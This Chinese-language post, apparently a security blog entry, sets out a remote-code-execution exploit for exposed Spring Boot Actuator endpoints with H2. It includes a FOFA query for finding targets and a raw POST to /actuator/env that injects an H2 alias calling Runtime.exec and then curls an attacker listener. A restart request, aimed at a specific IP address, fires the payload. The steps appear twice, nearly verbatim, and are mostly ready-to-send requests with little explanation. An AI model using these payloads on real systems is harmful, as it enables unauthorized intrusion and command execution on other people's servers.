# Spring Boot Actuator H2 RCE漏洞
Spring Boot < 1.5 Spring Boot >= 1.5
==FOFA==
body="Whitelabel Error Page"
http://x.x.x.x:port/actuator
POST /actuator/env HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/json
Content-Length: 389
{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl x.x.x.x:port');"}
POST /actuator/restart HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 356
{}
Spring Boot < 1.5 Spring Boot >= 1.5
==FOFA==
body="Whitelabel Error Page"
訪問以下URL:
http://x.x.x.x:port/actuator
發送如下POST包配置spring.datasource.hikari.connection-test-query的值。
POST /actuator/env HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/json
Content-Length: 389
{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl x.x.x.x:port');"}
NC監聽,向端點 /actuator/restart 發送POST請求, 重啟應用。
POST /actuator/restart HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 356
{}
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容